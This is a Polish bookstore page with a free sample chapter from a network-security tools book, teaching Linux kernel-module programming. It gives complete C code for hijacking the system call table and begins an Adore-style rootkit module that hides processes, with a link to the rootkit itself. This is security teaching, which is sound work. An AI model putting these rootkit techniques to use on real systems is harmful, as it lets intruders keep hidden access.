Cyfroteka.pl

klikaj i czytaj online

Cyfro
Czytomierz
00347 006856 18476234 na godz. na dobę w sumie
Bezpieczeństwo sieci. Narzędzia - książka
Bezpieczeństwo sieci. Narzędzia - książka
Autor: , Liczba stron: 320
Wydawca: Helion Język publikacji: polski
ISBN: 83-246-0068-X Data wydania:
Lektor:
Kategoria: ebooki >> komputery i informatyka >> hacking >> bezpieczeństwo sieci
Porównaj ceny (książka, ebook, audiobook).

Tworzenie i stosowanie narzędzi do testowania zabezpieczeń

Coraz częściej słyszymy o włamaniach do sieci i kradzieżach danych. Informacje o lukach w oprogramowaniu sieciowym pojawiają szybciej niż jego aktualizacje. Na administratorach sieci spoczywa trudne zadanie zabezpieczania zgromadzonych w nich danych przed atakami. W walce z hakerami administratorzy stosują narzędzia, dzięki którym są w stanie wykryć atak, usunąć słabe punkty sieci i systemu oraz ochronić dane. Czasem jednak standardowe narzędzia okazują się niewystarczające. W takich sytuacjach należy sięgnąć po inne rozwiązania.

Książka 'Bezpieczeństwo sieci. Narzędzia' to podręcznik dla administratorów oraz osób zajmujących się bezpieczeństwem sieci. Przedstawia najczęściej stosowane modyfikacje i rozszerzenia narzędzi Nessus, Ettercap i Nikto oraz opisuje zasady tworzenia zaawansowanych analizatorów ataków ściśle dostosowanych do wymogów określonego środowiska sieciowego. Zawiera również informacje dotyczące korzystania z narzędzi do skanowania portów, iniekcji pakietów, podsłuchiwania ruchu w sieci i oceny działania serwisów WWW.

Książka 'Bezpieczeństwo sieci. Narzędzia' jest nieodzownym źródłem wiedzy dla każdego administratora, który chce dobrze zabezpieczyć swoją sieć.

Znajdź podobne książki Ostatnio czytane w tej kategorii

Darmowy fragment publikacji:

IDZ DO IDZ DO PRZYK£ADOWY ROZDZIA£ PRZYK£ADOWY ROZDZIA£ SPIS TREŒCI SPIS TREŒCI KATALOG KSI¥¯EK KATALOG KSI¥¯EK KATALOG ONLINE KATALOG ONLINE ZAMÓW DRUKOWANY KATALOG ZAMÓW DRUKOWANY KATALOG TWÓJ KOSZYK TWÓJ KOSZYK DODAJ DO KOSZYKA DODAJ DO KOSZYKA CENNIK I INFORMACJE CENNIK I INFORMACJE ZAMÓW INFORMACJE ZAMÓW INFORMACJE O NOWOŒCIACH O NOWOŒCIACH ZAMÓW CENNIK ZAMÓW CENNIK CZYTELNIA CZYTELNIA FRAGMENTY KSI¥¯EK ONLINE FRAGMENTY KSI¥¯EK ONLINE Wydawnictwo Helion ul. Chopina 6 44-100 Gliwice tel. (32)230-98-63 e-mail: helion@helion.pl Bezpieczeñstwo sieci. Narzêdzia Autorzy: Nitesh Dhanjani, Justin Clarke T³umaczenie: S³awomir Dzieniszewski (przedmowa, rozdz. 1–6), Adam Jarczyk (rozdz. 7–11) ISBN: 83-246-0068-X Tytu³ orygina³u: Network Security Tools Format: B5, stron: 320 Tworzenie i stosowanie narzêdzi do testowania zabezpieczeñ (cid:129) Stwórz programy do analizowania ruchu sieciowego (cid:129) Dostosuj gotowe narzêdzia do swoich potrzeb (cid:129) Zbadaj bezpieczeñstwo w³asnych aplikacji WWW Coraz czêœciej s³yszymy o w³amaniach do sieci i kradzie¿ach danych. Informacje o lukach w oprogramowaniu sieciowym pojawiaj¹ szybciej ni¿ jego aktualizacje. Na administratorach sieci spoczywa trudne zadanie zabezpieczania zgromadzonych w nich danych przed atakami. W walce z hakerami administratorzy stosuj¹ narzêdzia, dziêki którym s¹ w stanie wykryæ atak, usun¹æ s³abe punkty sieci i systemu oraz ochroniæ dane. Czasem jednak standardowe narzêdzia okazuj¹ siê niewystarczaj¹ce. W takich sytuacjach nale¿y siêgn¹æ po inne rozwi¹zania. Ksi¹¿ka „Bezpieczeñstwo sieci. Narzêdzia” to podrêcznik dla administratorów oraz osób zajmuj¹cych siê bezpieczeñstwem sieci. Przedstawia najczêœciej stosowane modyfikacje i rozszerzenia narzêdzi Nessus, Ettercap i Nikto oraz opisuje zasady tworzenia zaawansowanych analizatorów ataków œciœle dostosowanych do wymogów okreœlonego œrodowiska sieciowego. Zawiera równie¿ informacje dotycz¹ce korzystania z narzêdzi do skanowania portów, iniekcji pakietów, pods³uchiwania ruchu w sieci i oceny dzia³ania serwisów WWW. (cid:129) Tworzenie dodatków dla programu Nessus (cid:129) Budowanie narzêdzi dla szperacza Ettercap (cid:129) Rozszerzanie mo¿liwoœci programów Hydra i Nikto (cid:129) Stosowanie narzêdzi do analizy kodów Ÿród³owych (cid:129) Zabezpieczanie j¹dra Linuksa (cid:129) Kontrolowanie bezpieczeñstwa serwisów WWW i baz danych (cid:129) Pisanie w³asnych szperaczy sieciowych oraz narzêdzi do iniekcji pakietów Ksi¹¿ka „Bezpieczeñstwo sieci. Narzêdzia” jest nieodzownym Ÿród³em wiedzy dla ka¿dego administratora, który chce dobrze zabezpieczyæ swoj¹ sieæ. Spis treści Część I Modyfikowanie i eksplorowanie narzędzi bezpieczeństwa Przedmowa .................................................................................................................... 7 13 1. Pisanie dodatków dla programu Nessus .....................................................................15 15 16 17 21 22 22 25 26 27 28 29 31 37 Architektura Nessusa Instalowanie Nessusa Korzystanie z programu Nessus Interpreter języka NASL Przykład „Hello World” Typy danych i zmienne Operatory Instrukcja if…else Pętle Funkcje Predefiniowane zmienne globalne Najważniejsze funkcje języka NASL Dodatki Nessusa 2. Programowanie narzędzi sekcjonujących i dodatków dla szperacza sieciowego Ettercap ............................................................................. 53 53 Instalacja i korzystanie z programu Ettercap 54 Pisanie narzędzia sekcjonujacego dla Ettercapa Pisanie dodatków dla programu Ettercap 61 3. Poszerzanie możliwości programów Hydra i Nmap .................................................. 67 67 81 Rozszerzanie możliwości programu Hydra Dodawanie nowych sygnatur do programu Nmap 4. Pisanie dodatków dla skanera luk Nikto ....................................................................85 85 86 88 89 91 Instalowanie programu Nikto Jak korzystać z programu Nikto? Jak działa program Nikto? Istniejące dodatki programu Nikto Dodawanie własnych pozycji do baz dodatków 3 Korzystanie z biblioteki LibWhisker Piszemy dodatek NTLM łamiący hasła metodą brutalnej siły Pisanie samodzielnego dodatku atakującego serwer Lotus Domino 94 96 99 5. Pisanie modułów dla oprogramowania Metasploit Framework .............................103 103 104 113 117 125 Wprowadzenie do MSF Zasada ataków polegających na przepełnieniu bufora stosu Pisanie ataków testowych pod MSF Moduł ataku przepełnienia bufora przeciw wyszukiwarce MnoGoSearch Pisanie pod MSF modułu badającego sygnaturę systemu operacyjnego Atakowanie aplikacji WWW z wykorzystaniem błędów w kodzie źródłowym Toolkit 101 PMD Rozszerzanie możliwości narzędzia PMD 6. Rozszerzanie analizy kodu na aplikacje WWW ........................................................ 131 131 136 139 141 165 7. Zabawa z modułami jądra Linuksa ............................................................................167 167 169 177 181 Część II Pisanie narzędzi do kontroli bezpieczeństwa sieci Witaj, świecie! Przechwytywanie funkcji systemowych Ukrywanie procesów Ukrywanie połączeń przed narzędziem netstat 8. Tworzenie narzędzi i skryptów do badania serwisów WWW ................................ 185 185 189 194 196 210 210 Środowisko aplikacji WWW Projekt skanera Analizator składni pliku dziennika Piszemy skaner Praca ze skanerem Pełny kod źródłowy 9. Automatyczne narzędzia eksploitów .......................................................................217 217 219 243 Eksploity wstrzykiwania kodu SQL Skaner eksploitów Praca ze skanerem 10. Pisanie szperaczy sieciowych ...................................................................................245 245 247 260 Biblioteka libpcap — wprowadzenie Zaczynamy pracę z libpcap libpcap i sieci bezprzewodowe 802.11 4 | Spis treści libpcap i Perl Leksykon funkcji biblioteki libpcap 268 269 11. Narzędzia do wstrzykiwania pakietów ................................................................... 279 279 280 287 289 296 Biblioteka libnet Początek pracy z biblioteką libnet Zaawansowane funkcje biblioteki libnet Jednoczesne wykorzystanie libnet i libpcap AirJack — wprowadzenie Skorowidz ..................................................................................................................303 Spis treści | 5 ROZDZIAŁ 7. Zabawa z modułami jądra Linuksa Jądro jest sercem systemu operacyjnego. Odpowiada za takie podstawowe funkcje jak zarzą- dzanie pamięcią, przydział czasu procesów, obsługę protokołów TCP/IP i tak dalej. Ładowalne moduły jądra Linuksa (ang. Loadable Kernel Module, LKM) pozwalają rozszerzać funkcjonalność systemu w trakcie pracy. Ponieważ łatwo jest ładować i usuwać moduły za pomocą narzędzi wiersza poleceń, złośliwi użytkownicy często używają opierających się na LKM narzędzi typu rootkit i backdoor, aby zachować dostęp do uprzednio zinfiltrowanego hosta. W niniejszym roz- dziale pokażemy, jak pisać własne ładowalne moduły jądra oraz jak autorzy złośliwych pa- kietów rootkit i backdoorów wykorzystują ogromne możliwości ładowalnych modułów jądra do różnych sztuczek, na przykład do ukrywania procesów i plików oraz przechwytywania funkcji systemowych. Zakładamy tu, że Czytelnik zna język programowania C. Nie należy uruchamiać przedstawionych przykładów na komputerach niezbędnych do pracy i serwerach produkcyjnych. Prosty błąd w LKM może spowodować błąd jądra (ang. kernel panic) i jego załamanie. Do uruchamiania programów przedstawionych w niniejszym rozdziale należy w miarę możliwości korzystać z oprogramowania maszyn wirtualnych, na przykład VMware (http://www.vmware.com/). Witaj, świecie! Aby przedstawić podstawy pisania ładowalnych modułów jądra, spróbujemy najpierw napi- sać prosty moduł, który podczas ładowania będzie wyświetlać na konsoli komunikat Witaj, świecie!, a podczas usuwania komunikat Do zobaczenia.. Na początek należy dołączyć wymagane pliki nagłówkowe: #include linux/module.h #include linux/kernel.h #include linux/init.h Jądro 2.6 Linuksa zgłasza ostrzeżenie przy ładowaniu modułów, których kod źródłowy nie jest objęty licencją GPL. Jądro Linuksa jest objęte tą licencją, a jego opiekunowie kładą duży nacisk na to, by wszelki kod ładowany do jądra również jej podlegał. Aby wyłączyć wyświe- tlanie ostrzeżenia, należy zaklasyfikować kod modułu jako objęty GPL, dodając następującą dyrektywę: MODULE_LICENSE ( GPL ); 167 Teraz zdefiniujemy funkcję hello(), która po prostu wyświetli na konsoli tekst Witaj, świecie! z pomocą funkcji printk(): static int __init hello (void) { printk (KERN_ALERT Witaj, świecie! ); return 0; } Następnie zdefiniujemy funkcję goodbye(), która wyświetli na konsoli tekst Do zobaczenia.: static void goodbye (void) { printk (KERN_ALERT Do zobaczenia. ); } Dalej ustawimy hello() i goodbye() odpowiednio w rolach funkcji inicjalizacji i wyjścia. Inaczej mówiąc, funkcja hello() będzie wywoływana przy ładowaniu modułu, a goodbye() przy jego usuwaniu: module_init(hello); module_exit(goodbye); hello_world.c Kod źródłowy naszego ładowalnego modułu jądra hello_world wygląda tak: #include linux/module.h #include linux/kernel.h #include linux/init.h MODULE_LICENSE ( GPL ); static int __init hello (void) { printk (KERN_ALERT Witaj, świecie! ); return 0; } static void goodbye (void) { printk (KERN_ALERT Do zobaczenia. ); } module_init(hello); module_exit(goodbye); Kompilacja i test hello_world Aby skompilować powyższy kod źródłowy, należy utworzyć prosty plik makefile zawierający wpis: obj-m += hello_world.o Do kompilacji modułu posłuży polecenie make: [nieroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules make: Entering directory `/usr/src/linux-2.6.8 CC [M] /tmp/lkms/hello_world.o Building modules, stage 2. MODPOST 168 | Rozdział 7. Zabawa z modułami jądra Linuksa CC /tmp/lkms/hello_world.mod.o LD [M] /tmp/lkms/hello_world.ko make: Leaving directory `/usr/src/linux-2.6.8 Moduł należy załadować z pomocą polecenia insmod: [root]# insmod ./hello_world.ko Witaj, świecie! Do wyświetlenia listy załadowanych modułów jądra służy narzędzie lsmod: [root]# lsmod Module Size Used by helloworld 2432 0 Do usunięcia modułu posłuży polecenie rmmod: [root]# rmmod hello_world Do zobaczenia. Przechwytywanie funkcji systemowych Procesy mogą być uruchamiane w jednym z dwóch trybów: użytkownika i jądra. Większość procesów uruchamia się w trybie użytkownika, w którym mają one dostęp jedynie do ogra- niczonych zasobów. Gdy proces wymaga skorzystania z usługi, którą oferuje jądro, wówczas wywołuje funkcję systemową (inaczej wywołanie systemowe; ang. system call). Funkcje sys- temowe pełnią rolę bramy dającej dostęp do jądra. Są przerwaniami programowymi, które system operacyjny przetwarza w trybie jądra. W poniższych punktach pokażemy, jak ładowalne moduły jądra mogą wykonywać różne sztuczki z przechwytywaniem funkcji systemowych. Tablica funkcji systemowych Jądro Linuksa utrzymuje tablicę funkcji systemowych, która składa się po prostu ze wskaźników funkcji implementujących wywołania systemowe. Listę funkcji systemowych implementowanych przez dane jądro można zobaczyć w pliku /usr/include/bits/syscall.h. Jądro przechowuje tablicę funkcji systemowych w strukturze o nazwie sys_call_table, którą można znaleźć w pliku arch/i386/kernel/entry.S. Jądro 2.5 i nowsze systemu Linux nie eksportują już struktury sys_call_table. W wersjach jądra wcześniejszych niż 2.5 ładowalny moduł jądra mógł uzyskać bezpo- średni dostęp do struktury sys_call_table, deklarując ją jako zmienną extern: extern void *sys_call_table[]; Dodatkowe informacje zawiera punkt „Przechwytywanie sys_exit() w jądrze 2.4” w dalszej części rozdziału. strace Twoim przyjacielem Często trzeba podczepić się do programu, aby się zorientować, które funkcje systemowe wywołuje. Do tego celu może posłużyć narzędzie strace. Popatrzmy np. na poniższy program w języku C, który po prostu wyświetla plik /etc/passwd: Przechwytywanie funkcji systemowych | 169 #include stdio.h int main(void) { FILE *myfile; char tempstring[1024]; if(!(myfile=fopen( /etc/passwd , r ))) { fprintf(stderr, Nie można otworzyć pliku ); exit(1); } while(!feof(myfile)) { fscanf(myfile, s ,tempstring); fprintf(stdout, s ,tempstring); } exit(0); } Po skompilowaniu kodu za pomocą kompilatora gcc tak, aby otrzymać program wykony- walny o nazwie a.out, należy wykonać poniższe polecenie: [nieroot]$ strace -o strace.out ./a.out /dev/null Wyjście polecenia strace zostało zapisane w pliku strace.out. Możemy teraz przyjrzeć się temu plikowi, aby poznać wszystkie wywołania funkcji dokonane przez a.out. Na przykład, wykonanie poniższego polecenia grep pozwoli się zorientować, że funkcja fopen() w programie a.out wywołuje funkcję systemową open(), aby otworzyć plik /etc/passwd: [nieroot]$ grep /etc/passwd strace.out open( /etc/passwd , O_RDONLY) = 3 Wymuszenie dostępu do sys_call_table Ponieważ tablica sys_call_table nie jest już eksportowana w jądrze 2.6, dostęp do niej można uzyskać tylko siłą (ang. brute force). Ładowalne moduły jądra mają dostęp do pamięci jądra, więc można zdobyć dostęp do sys_call_table przez porównanie znanych lokalizacji z wyeks- portowanymi funkcjami systemowymi. Wprawdzie sama tablica sys_call_table nie jest już eksportowana, lecz kilka funkcji systemowych, jak np. sys_read() i sys_write(),nadal podlega eksportowi i dostępnych jest dla ładowalnych modułów jądra. Aby zademonstrować, jak można zdobyć dostęp do tablicy sys_call_table w jądrze 2.6, napiszemy prosty LKM, który przechwytuje funkcję sys_open() i uniemożliwia komukolwiek otwarcie pliku /tmp/test. Wprawdzie przechwytujemy tu sys_open(), aby uniemożliwić komukolwiek otwarcie pliku, lecz takie rozwiązanie nie jest do końca skuteczne. Użytkownik root nadal dysponuje bezpośrednim dostępem do urządzenia dysku, na którym zdeterminowany użytkownik może operować bezpośrednio. Omówimy tu najważniejsze elementy; pełny kod źródłowy intercept_open.c jest przedstawiony w następnym podpunkcie. Proszę zwrócić uwagę, że podczas inicjalizacji zostaje wywołana funkcja my_init(). Funkcja ta próbuje uzyskać dostęp do tablicy sys_call_table, zaczynając od adresu system_utsname. Struktura system_utsname zawiera listę informacji o systemie i wiadomo, że znajduje się przed tablicą funkcji systemowych. Wobec tego funkcja zaczyna 170 | Rozdział 7. Zabawa z modułami jądra Linuksa przetwarzanie od lokalizacji system_utsname i przeprowadza 1024 iteracje (MAX_TRY). Za każdym razem przechodzi jeden bajt dalej i porównuje aktualną lokalizację z lokalizacją sys_read(), której adres, jak zakładamy, jest dostępny dla LKM. Po znalezieniu dopasowania funkcja wychodzi z pętli i mamy dostęp do tablicy sys_call_table: while(i) { if(sys_table[__NR_read] == (unsigned long)sys_read) { sys_call_table=sys_table; flag=1; break; } i--; sys_table++; } Nasz ładowalny moduł jądra wywołuje xchg() w celu takiego zmodyfikowania tablicy funkcji systemowych, by sys_call_table[__NR_open] wskazywała na our_fake_open_function(): original_sys_open =(void * )xchg( sys_call_table[__NR_open], our_fake_open_function); Dzięki temu zamiast oryginalnej funkcji sys_open() będzie wywoływana funkcja our_fake_ (cid:166)open_function(). Funkcja xchg() zwraca też wartość zmiennej original_sys_open, która zawiera wskaźnik na oryginalną funkcję sys_open(). Posłużymy się nim do przywrócenia w tablicy funkcji systemowych oryginalnej wartości sys_open() podczas usuwania LKM z jądra: xchg( sys_call_table[__NR_open], original_sys_open); Funkcja our_fake_open_function() sprawdza, czy parametr *filename wskazuje plik, któ- rego otwarcie chcemy uniemożliwić (w naszym przykładzie /tmp/test). Nie wystarcza jednak porównać /tmp/test z wartością filename, ponieważ jeśli np. katalogiem bieżącym procesu będzie /tmp, to funkcja sys_open() może zostać wywołana z parametrem test. Najpewniejszą metodą sprawdzenia, czy filename rzeczywiście odwołuje się do /tmp/test, jest porównanie i-węzła pliku /tmp/test z i-węzłem pliku odpowiadającego zmiennej filename. Nazwą i-węzeł (ang. inode) określa się strukturę danych zawierającą informacje o plikach w systemie. Ponieważ każdy plik ma unikatowy i-węzeł, możemy mieć pewność, że uzyskamy prawidłowy wynik. Aby otrzymać wartość i-węzła, our_fake_open_function() wywołuje funkcję user_path_walk() i przekazuje do niej wartość filename i strukturę typu nameidata, zgodnie z wymogami funkcji. Jednakże przed wywołaniem funkcji user_path_walk() z parametrem /tmp/test moduł wywołuje następujące funkcje: fs=get_fs(); set_fs(get_ds()); Funkcja user_path_walk() oczekuje, że zmienna filename wskazywać będzie na obszar pamięci w przestrzeni adresowej użytkownika. Ponieważ jednak piszemy moduł jądra, nasz kod znajdzie się w przestrzeni jądra i funkcja user_path_walk() nie zadziała poprawnie, ponieważ oczekuje uruchomienia w trybie użytkownika. Wobec tego, zanim wywołamy user_path_walk(), musimy wywołać funkcję get_fs(), która odczytuje położenie najwyższego segmentu pamięci jądra, a następnie wywołuje funkcję set_fs() mającą get_ds() w roli parame- tru. Zmienia to limit wirtualnej pamięci jądra dla pamięci przestrzeni użytkownika tak, że funkcja user_path_walk() będzie mogła zadziałać. Po zakończeniu wywołania user_path_walk() przez moduł przywrócony zostaje uprzedni limit: set_fs(fs); Przechwytywanie funkcji systemowych | 171 Jeśli i-węzły plików są równe, to wiemy, że użytkownik próbuje otworzyć plik /tmp/test, a moduł zwraca -EACCES: if(inode==inode_t) return -EACCES; W przeciwnym razie moduł wywołuje oryginalną funkcję sys_open(): return original_sys_open(filename,flags,mode); intercept_open.c Oto pełny kod źródłowy naszego ładowalnego modułu jądra intercept_open: #include linux/module.h #include linux/kernel.h #include linux/init.h #include linux/syscalls.h #include linux/unistd.h #include linux/proc_fs.h #include asm/uaccess.h #include linux/namei.h int flag=0; #define MAX_TRY 1024 MODULE_LICENSE ( GPL ); unsigned long *sys_call_table; asmlinkage long (*original_sys_open) (const char __user *filename, int flags, int mode); asmlinkage int our_fake_open_function(const char __user *filename, int flags, int mode) { int error; struct nameidata nd,nd_t; struct inode *inode,*inode_t; mm_segment_t fs; error=user_path_walk(filename, nd); if(!error) { inode=nd.dentry- d_inode; /*To trzeba zrobić przed wywołaniem user_path_walk() z przestrzeni jądra:*/ fs=get_fs(); set_fs(get_ds()); /*Chroni plik /tmp/test. Można zmienić na inny*/ error=user_path_walk( /tmp/test , nd_t); set_fs(fs); if(!error) { inode_t=nd_t.dentry- d_inode; 172 | Rozdział 7. Zabawa z modułami jądra Linuksa if(inode==inode_t) return -EACCES; } } return original_sys_open(filename,flags,mode); } static int __init my_init (void) { int i=MAX_TRY; unsigned long *sys_table; sys_table = (unsigned long *) system_utsname; while(i) { if(sys_table[__NR_read] == (unsigned long)sys_read) { sys_call_table=sys_table; flag=1; break; } i--; sys_table++; } if(flag) { original_sys_open =(void *)xchg( sys_call_table[__NR_open], our_fake_open_function); } return 0; } static void my_exit (void) { xchg( sys_call_table[__NR_open], original_sys_open); } module_init(my_init); module_exit(my_exit); Kompilacja i test intercept_open Do skompilowania programu intercept_open.c posłuży plik makefile zawierający wpis: obj-m += intercept_open.o Skompilujemy program z użyciem poniższego polecenia make: [nieroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules Utworzymy /tmp/test: [nieroot]$ echo test /tmp/test Załadujemy insert_open.ko: [root]# insmod ./intercept_open.ko Spróbujemy otworzyć /tmp/test: [root]# cat /tmp/test cat: /tmp/test: Permission denied Przechwytywanie funkcji systemowych | 173 Usuniemy moduł: [root]# rmmod intercept_open Ponownie spróbujemy otworzyć /tmp/test: [root]# cat /tmp/test test Przechwytywanie sys_unlink() za pomocą System.map W poprzednim punkcie pokazaliśmy, jak zdobyć adres sys_call_table, przeszukując pamięć jądra. Jeśli jednak jest dostępny plik System.map jądra, możemy się nim posłużyć, aby otrzymać lokalizację tablicy sys_call_table i zakodować ją na sztywno w LKM. Dobrym przykładem może być ładowalny moduł jądra, który uniemożliwia usuwanie plików przez przechwycenie sys_unlink(). Najpierw należy znaleźć lokalizację sys_call_table za pomocą pliku System.map: [nieroot]$ grep sys_call_table /boot/System.map c044fd00 D sys_call_table W kodzie źródłowym modułu adres, który posłuży do pobrania sys_call_table, zakodujemy na sztywno: *(long *) sys_call_table=0xc044fd00; Moduł tak modyfikuje tablicę funkcji systemowych, że __NR_unlink będzie wskazywać na hacked_sys_unlink i zachowa oryginalne położenie sys_unlink(): original_sys_unlink =(void * )xchg( sys_call_table[__NR_unlink], hacked_sys_unlink); Funkcja hacked_sys_unlink() przy każdym wywołaniu zwraca –1 i nigdy nie wywołuje oryginalnej funkcji sys_unlink(): asmlinkage long hacked_sys_unlink(const char *pathname) { return -1; } Dzięki temu żaden proces nie jest w stanie usunąć jakiegokolwiek pliku w systemie. intercept_unlink.c Oto pełny kod źródłowy naszego ładowalnego modułu jądra intercept_unlink: #include linux/module.h #include linux/kernel.h #include linux/init.h #include linux/syscalls.h #include linux/unistd.h MODULE_LICENSE ( GPL ); unsigned long *sys_call_table; asmlinkage long (*original_sys_unlink) (const char *pathname); /*zwraca -1. To uniemożliwi wszystkim procesom usunięcie dowolnego pliku*/ asmlinkage long hacked_sys_unlink(const char *pathname) { return -1; } 174 | Rozdział 7. Zabawa z modułami jądra Linuksa static int __init my_init (void) { /*pobieramy sys_call_table z zakodowanej na sztywno wartości, którą znaleźliśmy w System.map*/ *(long *) sys_call_table=0xc044fd00; /*zapamiętujemy oryginalne położenie sys_unlink. Zmieniamy sys_call_table tak, że wskazuje _ _NR_unlink na naszą hacked_sys_unlink*/ original_sys_unlink =(void * )xchg( sys_call_table[__NR_unlink], hacked_sys_unlink); return 0; } static void my_exit (void) { /*przywracamy oryginalną sys_unlink w sys_call_table*/ xchg( sys_call_table[__NR_unlink], original_sys_unlink); } module_init(my_init); module_exit(my_exit); Kompilacja i test modułu intercept_unlink Do przetestowania modułu użyjemy pliku makefile zawierającego wpis: obj-m += intercept_unlink.o Moduł skompilujemy z pomocą następującego polecenia: [nieroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules Utworzymy plik testowy: [nieroot]$ touch /tmp/testfile Załadujemy moduł: [root]# insmod ./intercept_unlink.ko Spróbujemy usunąć plik: [root]# rm -rf /tmp/testfile rm: cannot remove `/tmp/testfile : Operation not permitted Usuniemy moduł: [root]# rmmod intercept_unlink Teraz usunięcie pliku powinno być możliwe: [root]# rm -rf /tmp/testfile Przechwytywanie sys_exit() w jądrze 2.4 Jądra w wersji 2.4 eksportują symbol sys_call_table. Wielu użytkowników nadal korzysta z systemów z jądrem 2.4, więc pokażemy tu pokrótce, jak napisać dla tej wersji jądra LKM przechwytujący sys_exit(). Przykład jest bardzo prosty, więc po zrozumieniu zasady dzia- łania programu intercept_exit.c Czytelnik będzie mógł przenieść inne przykłady z niniejszego rozdziału na jądro 2.4. Przechwytywanie funkcji systemowych | 175 Jądra 2.4 dystrybuowane przez Red Hat zawierają część funkcji przeniesionych z jądra 2.6 i nie eksportują sys_call_table. W tym przypadku należy posłużyć się technikami przedstawionymi w poprzednich punktach i przechwycić sys_call_table metodą siłową lub z użyciem pliku System.map. Moduł intercept_exit przechwytuje funkcję sys_exit() i wyświetla na konsoli wartość error_code przekazaną do sys_exit(). Funkcja init_module() zostaje wywołana przy załado- waniu LKM. Funkcja ta zapisuje wskaźnik na oryginalną funkcję sys_exit() i zmienia wpis w sys_call_table[__NR_exit] na our_fake_exit_function: original_sys_exit = sys_call_table[__NR_exit]; sys_call_table[__NR_exit]=our_fake_exit_function; Funkcja our_fake_exit_function() wyświetla wartość error_code, a następnie wywołuje oryginalną funkcję sys_exit(): asmlinkage int our_fake_exit_function(int error_code) { printk( UWAGA! sys_exit wywołana z error_code= d ,error_code); return original_sys_exit(error_code); } W chwili usunięcia ładowalny moduł jądra przywraca w sys_call_table[__NR_exit] wskaza- nie na original_sys_exit: sys_call_table[__NR_exit]=original_sys_exit; intercept_exit.c Oto pełny kod źródłowy naszego ładowalnego modułu jądra intercept_exit: #include linux/module.h #include linux/kernel.h #include sys/syscall.h MODULE_LICENSE( GPL ); extern void *sys_call_table[]; asmlinkage int (*original_sys_exit)(int); asmlinkage int our_fake_exit_function(int error_code) { /*przy każdym wywołaniu wyświetla komunikat na konsoli*/ printk( UWAGA! sys_exit wywołana z error_code= d ,error_code); /*wywołuje orginalną sys_exit i zwraca jej wartość*/ return original_sys_exit(error_code); } int init_module(void) { /*zapisujemy odwołanie do oryginalnej funkcji sys_exit*/ original_sys_exit = sys_call_table[__NR_exit]; /*zmieniamy sys_call_table, by zamiast niej wywoływała naszą podrobioną funkcję wyjścia*/ sys_call_table[__NR_exit]=our_fake_exit_function; return 0; } 176 | Rozdział 7. Zabawa z modułami jądra Linuksa void cleanup_module(void) { /*przywracamy oryginalną sys_exit*/ sys_call_table[__NR_exit]=original_sys_exit; } Kompilacja i test intercept_exit Skompilujemy intercept_exit.c: [nieroot]$ gcc -D__KERNEL__ -DMODULE -I/usr/src/linux/include -c intercept_exit.c Załadujemy do jądra: [root]# insmod ./intercept_exit.o Spróbujemy poleceniem ls wyświetlić nieistniejący plik. Spowoduje to zakończenie przez ls działania z wartością niezerową, którą wyświetli nasz LKM: [nieroot]$ ls /tmp/nonexistent ls: /tmp/nonexistent: No such file or directory UWAGA! sys_exit wywołana z error_code=1 Pozostaje usunąć moduł po zakończeniu próby: [root]# rmmod intercept_exit Ukrywanie procesów Popularnym pakietem rootkit opartym na LKM jest Adore. Pozwala on użytkownikowi, między innymi, ukrywać procesy przez modyfikację funkcji obsługi wywołania readdir dla systemu plików /proc. Rootkit Adore można pobrać spod adresu http://packetstormsecurity.nl/groups/teso/. System plików /proc zawiera mnóstwo informacji o systemie, między innymi wiadomości o procesach. Załóżmy na przykład, że w systemie jest uruchomiony demon sshd. Za pomocą narzędzia ps można uzyskać identyfikator procesu (PID) demona: [nieroot]$ ps x | grep sshd 1431 ? S 0:00 /usr/sbin/sshd 4721 tty1 S 0:00 grep sshd W naszym przykładzie proces sshd ma PID 1431. Zajrzyjmy do katalogu /proc/1431, aby uzyskać dodatkowe informacje o procesie: [nieroot]$ ls -l /proc/1431/ total 0 -r-------- 1 root root 0 Sep 4 09:14 auxv -r--r--r-- 1 root root 0 Sep 4 09:12 cmdline lrwxrwxrwx 1 root root 0 Sep 4 09:14 cwd - / -r-------- 1 root root 0 Sep 4 09:12 environ lrwxrwxrwx 1 root root 0 Sep 4 09:14 exe - /usr/sbin/sshd dr-x------ 2 root root 0 Sep 4 09:14 fd -r--r--r-- 1 root root 0 Sep 4 09:14 maps -rw------- 1 root root 0 Sep 4 09:14 mem -r--r--r-- 1 root root 0 Sep 4 09:14 mounts Ukrywanie procesów | 177 lrwxrwxrwx 1 root root 0 Sep 4 09:14 root - / -r--r--r-- 1 root root 0 Sep 4 09:12 stat -r--r--r-- 1 root root 0 Sep 4 09:14 statm -r--r--r-- 1 root root 0 Sep 4 09:12 status dr-xr-xr-x 3 root root 0 Sep 4 09:14 task -r--r--r-- 1 root root 0 Sep 4 09:14 wchan Jak widać, w systemie plików /proc znajdują się również dane procesów. Narzędzie ps wyko- rzystuje /proc do pozyskania listy procesów uruchomionych w systemie. W niniejszym podrozdziale wykorzystamy techniki stosowane przez Adore do ukrycia wy- branego procesu. Użyjemy w tym celu ładowalnego modułu jądra, który nazwiemy hidepid. Na początek uruchomimy proces, który będziemy chcieli ukryć: [nieroot]$ sleep 999999 [1] 4781 Ze sposobu działania polecenia sleep wiadomo, że proces o identyfikatorze 4781 będzie do- stępny przez 999 999 sekund. Spróbujemy go ukryć. Funkcja hide_pid() w programie hidepid.c wymaga wskaźnika na oryginalną procedurę obsługi operacji readdir systemu plików /proc oraz nowej procedury obsługi readdir. Najpierw funkcja usiłuje pobrać deskryptor pliku, próbując otworzyć /proc: if((filep = filp_open( /proc ,O_RDONLY,0))==NULL) return -1; Wskaźnik na program obsługi operacji readdir katalogu /proc zostaje zapamiętany, aby można było go przywrócić przy usuwaniu LKM z jądra: if(orig_readdir) *orig_readdir = filep- f_op- readdir; Następnie procedura obsługi operacji readdir katalogu /proc zostaje ustawiona na new_readdir: filep- f_op- readdir=new_readdir; Podczas inicjalizacji funkcja hide_pid() jest wywoływana z następującymi parametrami: hide_pid( orig_proc_readdir,my_proc_readdir); Ponieważ drugim parametrem przekazywanym do hide_pid() jest my_proc_readdir, od- powiadający new_readdir, LKM ustawia my_proc_readdir jako procedurę obsługi operacji readdir dla /proc. Funkcja my_proc_readdir() wywołuje funkcję original_proc_readdir(), lecz z my_proc_filldir w roli procedury obsługi. Funkcja my_proc_filldir() po prostu sprawdza, czy nazwa PID odczytywanego z /proc jest taka sama jak nazwa PID, który chcemy ukryć. Jeśli tak, funkcja po prostu kończy działanie; w przeciwnym razie wywołuje oryginalną filldir(): if(adore_atoi(name)==HIDEPID) return 0; 